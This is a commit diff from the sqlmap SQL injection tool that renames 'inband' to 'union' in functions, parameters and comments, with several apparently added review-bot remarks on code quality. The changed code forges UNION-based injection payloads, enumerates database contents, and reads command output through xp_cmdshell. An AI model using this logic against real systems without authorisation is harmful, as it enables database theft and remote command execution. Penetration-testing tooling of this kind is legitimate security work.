Massive renaming (proper naming is inband = union & error techniques! - query naming stays as they are/in code things like forgeInbandQuery are renamed to forgeUnionQuery)

This commit is contained in:
Miroslav Stampar 2012-10-28 00:36:09 +02:00
parent a435ba6863
commit c1b8226329
16 changed files with 92 additions and 94 deletions


@ -436,7 +436,7 @@ def checkSqlInjection(place, parameter, value):
# Test for UNION injection and set the sample # Test for UNION injection and set the sample
# payload as well as the vector. # payload as well as the vector.
# NOTE: vector is set to a tuple with 6 elements, # NOTE: vector is set to a tuple with 6 elements,
# used afterwards by Agent.forgeInbandQuery() # used afterwards by Agent.forgeUnionQuery()
# method to forge the UNION query payload # method to forge the UNION query payload
configUnion(test.request.char, test.request.columns) configUnion(test.request.char, test.request.columns)


@ -133,7 +133,7 @@ def __formatInjection(inj):
if stype == PAYLOAD.TECHNIQUE.UNION: if stype == PAYLOAD.TECHNIQUE.UNION:
count = re.sub(r"(?i)(\(.+\))|(\blimit[^A-Za-z]+)", "", sdata.payload).count(',') + 1 count = re.sub(r"(?i)(\(.+\))|(\blimit[^A-Za-z]+)", "", sdata.payload).count(',') + 1
title = re.sub(r"\d+ to \d+", str(count), title) title = re.sub(r"\d+ to \d+", str(count), title)
vector = agent.forgeInbandQuery("[QUERY]", vector[0], vector[1], vector[2], None, None, vector[5], vector[6]) vector = agent.forgeUnionQuery("[QUERY]", vector[0], vector[1], vector[2], None, None, vector[5], vector[6])
if count == 1: if count == 1:
title = title.replace("columns", "column") title = title.replace("columns", "column")
elif comment: elif comment:


@ -561,7 +561,7 @@ class Agent:
return concatenatedQuery return concatenatedQuery
def forgeInbandQuery(self, query, position, count, comment, prefix, suffix, char, where, multipleUnions=None, limited=False, fromTable=None): def forgeUnionQuery(self, query, position, count, comment, prefix, suffix, char, where, multipleUnions=None, limited=False, fromTable=None):
""" """
Take in input an query (pseudo query) string and return its Take in input an query (pseudo query) string and return its
processed UNION ALL SELECT query. processed UNION ALL SELECT query.
@ -602,20 +602,20 @@ class Agent:
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, ): if Backend.getIdentifiedDbms() in (DBMS.MYSQL, ):
limitOriginal = "%s " % (queries[Backend.getIdentifiedDbms()].limit.query % (0, 1)) limitOriginal = "%s " % (queries[Backend.getIdentifiedDbms()].limit.query % (0, 1))
inbandQuery = self.prefixQuery("%sUNION ALL SELECT " % limitOriginal, prefix=prefix) unionQuery = self.prefixQuery("%sUNION ALL SELECT " % limitOriginal, prefix=prefix)
if limited: if limited:
inbandQuery += ','.join(char if _ != position else '(SELECT %s)' % query for _ in xrange(0, count)) unionQuery += ','.join(char if _ != position else '(SELECT %s)' % query for _ in xrange(0, count))
inbandQuery += fromTable unionQuery += fromTable
inbandQuery = self.suffixQuery(inbandQuery, comment, suffix) unionQuery = self.suffixQuery(unionQuery, comment, suffix)
return inbandQuery return unionQuery
topNumRegex = re.search("\ATOP\s+([\d]+)\s+", query, re.I) topNumRegex = re.search("\ATOP\s+([\d]+)\s+", query, re.I)
if topNumRegex: if topNumRegex:
topNum = topNumRegex.group(1) topNum = topNumRegex.group(1)
query = query[len("TOP %s " % topNum):] query = query[len("TOP %s " % topNum):]
inbandQuery += "TOP %s " % topNum unionQuery += "TOP %s " % topNum
intoRegExp = re.search("(\s+INTO (DUMP|OUT)FILE\s+\'(.+?)\')", query, re.I) intoRegExp = re.search("(\s+INTO (DUMP|OUT)FILE\s+\'(.+?)\')", query, re.I)
@ -623,51 +623,51 @@ class Agent:
intoRegExp = intoRegExp.group(1) intoRegExp = intoRegExp.group(1)
query = query[:query.index(intoRegExp)] query = query[:query.index(intoRegExp)]
if fromTable and inbandQuery.endswith(fromTable): if fromTable and unionQuery.endswith(fromTable):
inbandQuery = inbandQuery[:-len(fromTable)] unionQuery = unionQuery[:-len(fromTable)]
for element in xrange(0, count): for element in xrange(0, count):
if element > 0: if element > 0:
inbandQuery += ',' unionQuery += ','
if element == position: if element == position:
if " FROM " in query and ("(CASE " not in query or ("(CASE " in query and "WHEN use" in query)) and "EXISTS(" not in query and not query.startswith("SELECT "): if " FROM " in query and ("(CASE " not in query or ("(CASE " in query and "WHEN use" in query)) and "EXISTS(" not in query and not query.startswith("SELECT "):
conditionIndex = query.index(" FROM ") conditionIndex = query.index(" FROM ")
inbandQuery += query[:conditionIndex] unionQuery += query[:conditionIndex]
else: else:
inbandQuery += query unionQuery += query
else: else:
inbandQuery += char unionQuery += char
if " FROM " in query and ("(CASE " not in query or ("(CASE " in query and "WHEN use" in query)) and "EXISTS(" not in query and not query.startswith("SELECT "): if " FROM " in query and ("(CASE " not in query or ("(CASE " in query and "WHEN use" in query)) and "EXISTS(" not in query and not query.startswith("SELECT "):
conditionIndex = query.index(" FROM ") conditionIndex = query.index(" FROM ")
inbandQuery += query[conditionIndex:] unionQuery += query[conditionIndex:]
if fromTable: if fromTable:
if " FROM " not in inbandQuery or "(CASE " in inbandQuery or "(IIF" in inbandQuery: if " FROM " not in unionQuery or "(CASE " in unionQuery or "(IIF" in unionQuery:
inbandQuery += fromTable unionQuery += fromTable
if intoRegExp: if intoRegExp:
inbandQuery += intoRegExp unionQuery += intoRegExp
if multipleUnions: if multipleUnions:
inbandQuery += " UNION ALL SELECT " unionQuery += " UNION ALL SELECT "
for element in xrange(count): for element in xrange(count):
if element > 0: if element > 0:
inbandQuery += ',' unionQuery += ','
if element == position: if element == position:
inbandQuery += multipleUnions unionQuery += multipleUnions
else: else:
inbandQuery += char unionQuery += char
if fromTable: if fromTable:
inbandQuery += fromTable unionQuery += fromTable
inbandQuery = self.suffixQuery(inbandQuery, comment, suffix) unionQuery = self.suffixQuery(unionQuery, comment, suffix)
return inbandQuery return unionQuery
def limitQuery(self, num, query, field=None, uniqueField=None): def limitQuery(self, num, query, field=None, uniqueField=None):
""" """
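Review bot: The long `" FROM " in query and ("(CASE " not in query or ("(CASE " in query and "WHEN use" in query)) and "EXISTS(" not in query and not query.startswith("SELECT ")` condition is written out twice inside the column loop of forgeUnionQuery (in the `element == position` branch and again directly after it) even though `query` is not modified within the loop, so the two copies can silently drift apart. Hoisting it once before `for element in xrange(0, count):` as `splitAtFrom = " FROM " in query and ("(CASE " not in query or "WHEN use" in query) and "EXISTS(" not in query and not query.startswith("SELECT ")` and testing `if splitAtFrom:` at both sites preserves the truth table (`A or (not A and B)` is `A or B`) and reads as one rule. The `TOP` and `INTO ... FILE` patterns are non-raw strings (`"\ATOP\s+([\d]+)\s+"`); writing them as `r"\ATOP\s+(\d+)\s+"` avoids relying on unknown escapes being passed through. The docstring and the early lines of this method lie between the first two hunks of the section.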


@ -1150,7 +1150,7 @@ def getLimitRange(count, dump=False, plusOne=False):
def parseUnionPage(page): def parseUnionPage(page):
""" """
Returns resulting items from inband query inside provided page content Returns resulting items from union query inside provided page content
""" """
if page is None: if page is None:


@ -435,7 +435,7 @@ MAX_DNS_LABEL = 63
# Alphabet used for prefix and suffix strings of name resolution requests in DNS technique (excluding hexadecimal chars for not mixing with inner content) # Alphabet used for prefix and suffix strings of name resolution requests in DNS technique (excluding hexadecimal chars for not mixing with inner content)
DNS_BOUNDARIES_ALPHABET = re.sub("[a-fA-F]", "", string.letters) DNS_BOUNDARIES_ALPHABET = re.sub("[a-fA-F]", "", string.letters)
# Connection chunk size (processing large responses in chunks to avoid MemoryError crashes - e.g. large table dump in full UNION/inband injections) # Connection chunk size (processing large responses in chunks to avoid MemoryError crashes - e.g. large table dump in full UNION injections)
MAX_CONNECTION_CHUNK_SIZE = 10 * 1024 * 1024 MAX_CONNECTION_CHUNK_SIZE = 10 * 1024 * 1024
# Maximum response total page size (trimmed if larger) # Maximum response total page size (trimmed if larger)


@ -347,9 +347,9 @@ def __goBooleanProxy(expression):
return output return output
def __goInband(expression, unpack=True, dump=False): def __goUnion(expression, unpack=True, dump=False):
""" """
Retrieve the output of a SQL query taking advantage of an inband SQL Retrieve the output of a SQL query taking advantage of an union SQL
injection vulnerability on the affected parameter. injection vulnerability on the affected parameter.
""" """
@ -360,12 +360,10 @@ def __goInband(expression, unpack=True, dump=False):
return output return output
def getValue(expression, blind=True, inband=True, error=True, time=True, fromUser=False, expected=None, batch=False, unpack=True, resumeValue=True, charsetType=None, firstChar=None, lastChar=None, dump=False, suppressOutput=None, expectingNone=False, safeCharEncode=True): def getValue(expression, blind=True, union=True, error=True, time=True, fromUser=False, expected=None, batch=False, unpack=True, resumeValue=True, charsetType=None, firstChar=None, lastChar=None, dump=False, suppressOutput=None, expectingNone=False, safeCharEncode=True):
""" """
Called each time sqlmap inject a SQL query on the SQL injection Called each time sqlmap inject a SQL query on the SQL injection
affected parameter. It can call a function to retrieve the output affected parameter.
through inband SQL injection (if selected) and/or blind SQL injection
(if selected).
""" """
kb.safeCharEncode = safeCharEncode kb.safeCharEncode = safeCharEncode
@ -400,9 +398,9 @@ def getValue(expression, blind=True, inband=True, error=True, time=True, fromUse
query = query.replace("DISTINCT ", "") query = query.replace("DISTINCT ", "")
if not conf.forceDns: if not conf.forceDns:
if inband and isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION): if union and isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION):
kb.technique = PAYLOAD.TECHNIQUE.UNION kb.technique = PAYLOAD.TECHNIQUE.UNION
value = __goInband(forgeCaseExpression if expected == EXPECTED.BOOL else query, unpack, dump) value = __goUnion(forgeCaseExpression if expected == EXPECTED.BOOL else query, unpack, dump)
count += 1 count += 1
found = (value is not None) or (value is None and expectingNone) or count >= MAX_TECHNIQUES_PER_VALUE found = (value is not None) or (value is None and expectingNone) or count >= MAX_TECHNIQUES_PER_VALUE
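Review bot: Renaming the keyword parameter `inband` to `union` in the getValue signature is an interface break that only surfaces at call time: any caller not updated in this commit (it touches 16 files) will raise a TypeError on `inband=False` the first time that code path runs. A transitional alias avoids that, e.g. append `inband=None` to the signature and open the body with `if inband is not None: union = inband  # deprecated spelling, remove after callers migrate`. The hunk also shortens the docstring to "affected parameter." and drops the sentence saying the function dispatches to the selected techniques; a one-line replacement such as `It tries each enabled technique in turn and returns the first value retrieved.` would keep that documented (the order is only partly visible here, with UNION tried first). getValue's body continues outside the hunk.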


@ -213,12 +213,12 @@ class xp_cmdshell:
output = inject.getValue(query, resumeValue=False, blind=False, time=False) output = inject.getValue(query, resumeValue=False, blind=False, time=False)
else: else:
output = [] output = []
count = inject.getValue("SELECT COUNT(*) FROM %s" % self.cmdTblName, resumeValue=False, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) count = inject.getValue("SELECT COUNT(*) FROM %s" % self.cmdTblName, resumeValue=False, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
if isNumPosStrValue(count): if isNumPosStrValue(count):
for index in getLimitRange(count): for index in getLimitRange(count):
query = agent.limitQuery(index, query, self.tblField) query = agent.limitQuery(index, query, self.tblField)
output.append(inject.getValue(query, inband=False, error=False, resumeValue=False)) output.append(inject.getValue(query, union=False, error=False, resumeValue=False))
inject.goStacked("DELETE FROM %s" % self.cmdTblName) inject.goStacked("DELETE FROM %s" % self.cmdTblName)


@ -101,7 +101,7 @@ def __findUnionCharCount(comment, place, parameter, value, prefix, suffix, where
pages = {} pages = {}
for count in xrange(lowerCount, upperCount+1): for count in xrange(lowerCount, upperCount+1):
query = agent.forgeInbandQuery('', -1, count, comment, prefix, suffix, kb.uChar, where) query = agent.forgeUnionQuery('', -1, count, comment, prefix, suffix, kb.uChar, where)
payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where) payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where)
page, headers = Request.queryPage(payload, place=place, content=True, raise404=False) page, headers = Request.queryPage(payload, place=place, content=True, raise404=False)
if not isNullValue(kb.uChar): if not isNullValue(kb.uChar):
@ -166,7 +166,7 @@ def __unionPosition(comment, place, parameter, prefix, suffix, count, where=PAYL
# For each column of the table (# of NULL) perform a request using # For each column of the table (# of NULL) perform a request using
# the UNION ALL SELECT statement to test it the target url is # the UNION ALL SELECT statement to test it the target url is
# affected by an exploitable inband SQL injection vulnerability # affected by an exploitable union SQL injection vulnerability
for position in positions: for position in positions:
# Prepare expression with delimiters # Prepare expression with delimiters
randQuery = randomStr(UNION_MIN_RESPONSE_CHARS) randQuery = randomStr(UNION_MIN_RESPONSE_CHARS)
@ -174,8 +174,8 @@ def __unionPosition(comment, place, parameter, prefix, suffix, count, where=PAYL
randQueryProcessed = agent.concatQuery("\'%s\'" % randQuery) randQueryProcessed = agent.concatQuery("\'%s\'" % randQuery)
randQueryUnescaped = unescaper.unescape(randQueryProcessed) randQueryUnescaped = unescaper.unescape(randQueryProcessed)
# Forge the inband SQL injection request # Forge the union SQL injection request
query = agent.forgeInbandQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where) query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where)
payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where) payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where)
# Perform the request # Perform the request
@ -196,8 +196,8 @@ def __unionPosition(comment, place, parameter, prefix, suffix, count, where=PAYL
randQueryProcessed2 = agent.concatQuery("\'%s\'" % randQuery2) randQueryProcessed2 = agent.concatQuery("\'%s\'" % randQuery2)
randQueryUnescaped2 = unescaper.unescape(randQueryProcessed2) randQueryUnescaped2 = unescaper.unescape(randQueryProcessed2)
# Confirm that it is a full inband SQL injection # Confirm that it is a full union SQL injection
query = agent.forgeInbandQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where, multipleUnions=randQueryUnescaped2) query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where, multipleUnions=randQueryUnescaped2)
payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where) payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where)
# Perform the request # Perform the request
@ -210,7 +210,7 @@ def __unionPosition(comment, place, parameter, prefix, suffix, count, where=PAYL
fromTable = " FROM (%s) AS %s" % (" UNION ".join("SELECT %d%s%s" % (_, FROM_DUMMY_TABLE.get(Backend.getIdentifiedDbms(), ""), " AS %s" % randomStr() if _ == 0 else "") for _ in xrange(LIMITED_ROWS_TEST_NUMBER)), randomStr()) fromTable = " FROM (%s) AS %s" % (" UNION ".join("SELECT %d%s%s" % (_, FROM_DUMMY_TABLE.get(Backend.getIdentifiedDbms(), ""), " AS %s" % randomStr() if _ == 0 else "") for _ in xrange(LIMITED_ROWS_TEST_NUMBER)), randomStr())
# Check for limited row output # Check for limited row output
query = agent.forgeInbandQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where, fromTable=fromTable) query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where, fromTable=fromTable)
payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where) payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where)
# Perform the request # Perform the request
@ -239,11 +239,11 @@ def __unionConfirm(comment, place, parameter, prefix, suffix, count):
validPayload = None validPayload = None
vector = None vector = None
# Confirm the inband SQL injection and get the exact column # Confirm the union SQL injection and get the exact column
# position which can be used to extract data # position which can be used to extract data
validPayload, vector = __unionPosition(comment, place, parameter, prefix, suffix, count) validPayload, vector = __unionPosition(comment, place, parameter, prefix, suffix, count)
# Assure that the above function found the exploitable full inband # Assure that the above function found the exploitable full union
# SQL injection position # SQL injection position
if not validPayload: if not validPayload:
validPayload, vector = __unionPosition(comment, place, parameter, prefix, suffix, count, where=PAYLOAD.WHERE.NEGATIVE) validPayload, vector = __unionPosition(comment, place, parameter, prefix, suffix, count, where=PAYLOAD.WHERE.NEGATIVE)
@ -252,7 +252,7 @@ def __unionConfirm(comment, place, parameter, prefix, suffix, count):
def __unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix): def __unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix):
""" """
This method tests if the target url is affected by an inband This method tests if the target url is affected by an union
SQL injection vulnerability. The test is done up to 50 columns SQL injection vulnerability. The test is done up to 50 columns
on the target database table on the target database table
""" """
@ -297,7 +297,7 @@ def __unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix
def unionTest(comment, place, parameter, value, prefix, suffix): def unionTest(comment, place, parameter, value, prefix, suffix):
""" """
This method tests if the target url is affected by an inband This method tests if the target url is affected by an union
SQL injection vulnerability. The test is done up to 3*50 times SQL injection vulnerability. The test is done up to 3*50 times
""" """


@ -48,7 +48,7 @@ from lib.core.unescaper import unescaper
from lib.request.connect import Connect as Request from lib.request.connect import Connect as Request
def __oneShotUnionUse(expression, unpack=True, limited=False): def __oneShotUnionUse(expression, unpack=True, limited=False):
retVal = hashDBRetrieve("%s%s" % (conf.hexConvert, expression), checkConf=True) # as inband data is stored raw unconverted retVal = hashDBRetrieve("%s%s" % (conf.hexConvert, expression), checkConf=True) # as union data is stored raw unconverted
threadData = getCurrentThreadData() threadData = getCurrentThreadData()
threadData.resumed = retVal is not None threadData.resumed = retVal is not None
@ -59,10 +59,10 @@ def __oneShotUnionUse(expression, unpack=True, limited=False):
where = PAYLOAD.WHERE.NEGATIVE if conf.limitStart or conf.limitStop else None where = PAYLOAD.WHERE.NEGATIVE if conf.limitStart or conf.limitStop else None
# Forge the inband SQL injection request # Forge the union SQL injection request
vector = kb.injection.data[PAYLOAD.TECHNIQUE.UNION].vector vector = kb.injection.data[PAYLOAD.TECHNIQUE.UNION].vector
kb.unionDuplicates = vector[7] kb.unionDuplicates = vector[7]
query = agent.forgeInbandQuery(injExpression, vector[0], vector[1], vector[2], vector[3], vector[4], vector[5], vector[6], None, limited) query = agent.forgeUnionQuery(injExpression, vector[0], vector[1], vector[2], vector[3], vector[4], vector[5], vector[6], None, limited)
payload = agent.payload(newValue=query, where=where) payload = agent.payload(newValue=query, where=where)
# Perform the request # Perform the request
@ -90,7 +90,7 @@ def __oneShotUnionUse(expression, unpack=True, limited=False):
if retVal is not None: if retVal is not None:
retVal = getUnicode(retVal, kb.pageEncoding) retVal = getUnicode(retVal, kb.pageEncoding)
# Special case when DBMS is Microsoft SQL Server and error message is used as a result of inband injection # Special case when DBMS is Microsoft SQL Server and error message is used as a result of union injection
if Backend.isDbms(DBMS.MSSQL) and wasLastRequestDBMSError(): if Backend.isDbms(DBMS.MSSQL) and wasLastRequestDBMSError():
retVal = htmlunescape(retVal).replace("<br>", "\n") retVal = htmlunescape(retVal).replace("<br>", "\n")
@ -140,9 +140,9 @@ def configUnion(char=None, columns=None):
def unionUse(expression, unpack=True, dump=False): def unionUse(expression, unpack=True, dump=False):
""" """
This function tests for an inband SQL injection on the target This function tests for an union SQL injection on the target
url then call its subsidiary function to effectively perform an url then call its subsidiary function to effectively perform an
inband SQL injection on the affected url union SQL injection on the affected url
""" """
initTechnique(PAYLOAD.TECHNIQUE.UNION) initTechnique(PAYLOAD.TECHNIQUE.UNION)
@ -341,7 +341,7 @@ def unionUse(expression, unpack=True, dump=False):
kb.suppressResumeInfo = False kb.suppressResumeInfo = False
if not value and not abortedFlag: if not value and not abortedFlag:
expression = re.sub("\s*ORDER BY\s+[\w,]+", "", expression, re.I) # full inband doesn't play well with ORDER BY expression = re.sub("\s*ORDER BY\s+[\w,]+", "", expression, re.I) # full union doesn't play well with ORDER BY
value = __oneShotUnionUse(expression, unpack) value = __oneShotUnionUse(expression, unpack)
duration = calculateDeltaSeconds(start) duration = calculateDeltaSeconds(start)
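Review bot: On the changed line `expression = re.sub("\s*ORDER BY\s+[\w,]+", "", expression, re.I)` the `re.I` is passed as re.sub's fourth positional parameter, which is `count`, not `flags`; since `re.I == 2` the call replaces at most two matches and, more importantly, matches case-sensitively, so a lower-case `order by` presumably survives the stripping the comment describes. Use the inline flag, as the `(?i)` pattern elsewhere in this commit does: `expression = re.sub(r"(?i)\s*ORDER BY\s+[\w,]+", "", expression)`. unionUse's body continues outside the hunk.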


@ -35,7 +35,7 @@ def pivotDumpTable(table, colList, count=None, blind=True):
if count is None: if count is None:
query = dumpNode.count % table query = dumpNode.count % table
count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) if blind else inject.getValue(query, blind=False, time=False, expected=EXPECTED.INT) count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) if blind else inject.getValue(query, blind=False, time=False, expected=EXPECTED.INT)
if isinstance(count, basestring) and count.isdigit(): if isinstance(count, basestring) and count.isdigit():
count = int(count) count = int(count)
@ -65,7 +65,7 @@ def pivotDumpTable(table, colList, count=None, blind=True):
logger.info(infoMsg) logger.info(infoMsg)
query = dumpNode.count2 % (column, table) query = dumpNode.count2 % (column, table)
value = inject.getValue(query, blind=blind, inband=not blind, error=not blind, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) value = inject.getValue(query, blind=blind, union=not blind, error=not blind, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
if isNumPosStrValue(value): if isNumPosStrValue(value):
validColumnList = True validColumnList = True
@ -110,7 +110,7 @@ def pivotDumpTable(table, colList, count=None, blind=True):
else: else:
query = dumpNode.query2 % (column, table, colList[0], pivotValue) query = dumpNode.query2 % (column, table, colList[0], pivotValue)
value = unArrayizeValue(inject.getValue(query, blind=blind, time=blind, inband=not blind, error=not blind)) value = unArrayizeValue(inject.getValue(query, blind=blind, time=blind, union=not blind, error=not blind))
if column == colList[0]: if column == colList[0]:
if isNoneValue(value): if isNoneValue(value):


@ -119,7 +119,7 @@ class Enumeration(GenericEnumeration):
for query in (rootQuery.blind.count, rootQuery.blind.count2, rootQuery.blind.count3): for query in (rootQuery.blind.count, rootQuery.blind.count2, rootQuery.blind.count3):
_ = query.replace("%s", db) _ = query.replace("%s", db)
count = inject.getValue(_, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) count = inject.getValue(_, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
if not isNoneValue(count): if not isNoneValue(count):
break break
@ -135,7 +135,7 @@ class Enumeration(GenericEnumeration):
for index in xrange(int(count)): for index in xrange(int(count)):
_ = (rootQuery.blind.query if query == rootQuery.blind.count else rootQuery.blind.query2 if query == rootQuery.blind.count2 else rootQuery.blind.query3).replace("%s", db) % index _ = (rootQuery.blind.query if query == rootQuery.blind.count else rootQuery.blind.query2 if query == rootQuery.blind.count2 else rootQuery.blind.query3).replace("%s", db) % index
table = inject.getValue(_, inband=False, error=False) table = inject.getValue(_, union=False, error=False)
if not isNoneValue(table): if not isNoneValue(table):
kb.hintValue = table kb.hintValue = table
table = safeSQLIdentificatorNaming(table, True) table = safeSQLIdentificatorNaming(table, True)
@ -220,7 +220,7 @@ class Enumeration(GenericEnumeration):
query = rootQuery.blind.count query = rootQuery.blind.count
query = query.replace("%s", db) query = query.replace("%s", db)
query += " AND %s" % tblQuery query += " AND %s" % tblQuery
count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
if not isNumPosStrValue(count): if not isNumPosStrValue(count):
warnMsg = "no table" warnMsg = "no table"
@ -239,7 +239,7 @@ class Enumeration(GenericEnumeration):
query = query.replace("%s", db) query = query.replace("%s", db)
query += " AND %s" % tblQuery query += " AND %s" % tblQuery
query = agent.limitQuery(index, query, tblCond) query = agent.limitQuery(index, query, tblCond)
tbl = inject.getValue(query, inband=False, error=False) tbl = inject.getValue(query, union=False, error=False)
kb.hintValue = tbl kb.hintValue = tbl
foundTbls[db].append(tbl) foundTbls[db].append(tbl)
@ -367,7 +367,7 @@ class Enumeration(GenericEnumeration):
query = query % (db, db, db, db, db, db) query = query % (db, db, db, db, db, db)
query += " AND %s" % colQuery.replace("[DB]", db) query += " AND %s" % colQuery.replace("[DB]", db)
query += whereTblsQuery.replace("[DB]", db) query += whereTblsQuery.replace("[DB]", db)
count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
if not isNumPosStrValue(count): if not isNumPosStrValue(count):
warnMsg = "no tables contain column" warnMsg = "no tables contain column"
@ -387,7 +387,7 @@ class Enumeration(GenericEnumeration):
query += " AND %s" % colQuery.replace("[DB]", db) query += " AND %s" % colQuery.replace("[DB]", db)
query += whereTblsQuery.replace("[DB]", db) query += whereTblsQuery.replace("[DB]", db)
query = agent.limitQuery(index, query, colCond.replace("[DB]", db)) query = agent.limitQuery(index, query, colCond.replace("[DB]", db))
tbl = inject.getValue(query, inband=False, error=False) tbl = inject.getValue(query, union=False, error=False)
kb.hintValue = tbl kb.hintValue = tbl
tbl = safeSQLIdentificatorNaming(tbl, True) tbl = safeSQLIdentificatorNaming(tbl, True)


@ -119,7 +119,7 @@ class Enumeration(GenericEnumeration):
query = rootQuery.blind.count2 % queryUser query = rootQuery.blind.count2 % queryUser
else: else:
query = rootQuery.blind.count % queryUser query = rootQuery.blind.count % queryUser
count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
if not isNumPosStrValue(count): if not isNumPosStrValue(count):
if count != 0 and not query2: if count != 0 and not query2:
@ -145,7 +145,7 @@ class Enumeration(GenericEnumeration):
query = rootQuery.blind.query2 % (queryUser, index) query = rootQuery.blind.query2 % (queryUser, index)
else: else:
query = rootQuery.blind.query % (queryUser, index) query = rootQuery.blind.query % (queryUser, index)
role = inject.getValue(query, inband=False, error=False) role = inject.getValue(query, union=False, error=False)
# In Oracle we get the list of roles as string # In Oracle we get the list of roles as string
roles.add(role) roles.add(role)


@ -116,7 +116,7 @@ class Databases:
query = rootQuery.blind.count2 query = rootQuery.blind.count2
else: else:
query = rootQuery.blind.count query = rootQuery.blind.count
count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
if not isNumPosStrValue(count): if not isNumPosStrValue(count):
errMsg = "unable to retrieve the number of databases" errMsg = "unable to retrieve the number of databases"
@ -132,7 +132,7 @@ class Databases:
query = rootQuery.blind.query2 % index query = rootQuery.blind.query2 % index
else: else:
query = rootQuery.blind.query % index query = rootQuery.blind.query % index
db = inject.getValue(query, inband=False, error=False) db = inject.getValue(query, union=False, error=False)
if db: if db:
kb.data.cachedDbs.append(safeSQLIdentificatorNaming(db)) kb.data.cachedDbs.append(safeSQLIdentificatorNaming(db))
@ -300,7 +300,7 @@ class Databases:
else: else:
query = rootQuery.blind.count % unsafeSQLIdentificatorNaming(db) query = rootQuery.blind.count % unsafeSQLIdentificatorNaming(db)
count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
if count == 0: if count == 0:
warnMsg = "database '%s' " % unsafeSQLIdentificatorNaming(db) warnMsg = "database '%s' " % unsafeSQLIdentificatorNaming(db)
@ -329,7 +329,7 @@ class Databases:
else: else:
query = rootQuery.blind.query % (unsafeSQLIdentificatorNaming(db), index) query = rootQuery.blind.query % (unsafeSQLIdentificatorNaming(db), index)
table = inject.getValue(query, inband=False, error=False) table = inject.getValue(query, union=False, error=False)
if not isNoneValue(table): if not isNoneValue(table):
kb.hintValue = table kb.hintValue = table
table = safeSQLIdentificatorNaming(table, True) table = safeSQLIdentificatorNaming(table, True)
@ -593,11 +593,11 @@ class Databases:
elif Backend.isDbms(DBMS.SQLITE): elif Backend.isDbms(DBMS.SQLITE):
query = rootQuery.blind.query % tbl query = rootQuery.blind.query % tbl
value = inject.getValue(query, inband=False, error=False) value = inject.getValue(query, union=False, error=False)
parseSqliteTableSchema(value) parseSqliteTableSchema(value)
return kb.data.cachedColumns return kb.data.cachedColumns
count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
if not isNumPosStrValue(count): if not isNumPosStrValue(count):
errMsg = "unable to retrieve the number of columns " errMsg = "unable to retrieve the number of columns "
@ -629,7 +629,7 @@ class Databases:
field = None field = None
query = agent.limitQuery(index, query, field, field) query = agent.limitQuery(index, query, field, field)
column = inject.getValue(query, inband=False, error=False) column = inject.getValue(query, union=False, error=False)
if not isNoneValue(column): if not isNoneValue(column):
if not onlyColNames: if not onlyColNames:
@ -643,7 +643,7 @@ class Databases:
elif Backend.isDbms(DBMS.FIREBIRD): elif Backend.isDbms(DBMS.FIREBIRD):
query = rootQuery.blind.query2 % (tbl, column) query = rootQuery.blind.query2 % (tbl, column)
colType = inject.getValue(query, inband=False, error=False) colType = inject.getValue(query, union=False, error=False)
if Backend.isDbms(DBMS.FIREBIRD): if Backend.isDbms(DBMS.FIREBIRD):
colType = FIREBIRD_TYPES.get(colType, colType) colType = FIREBIRD_TYPES.get(colType, colType)


@ -210,7 +210,7 @@ class Entries:
else: else:
query = rootQuery.blind.count % (conf.db, tbl) query = rootQuery.blind.count % (conf.db, tbl)
count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
lengths = {} lengths = {}
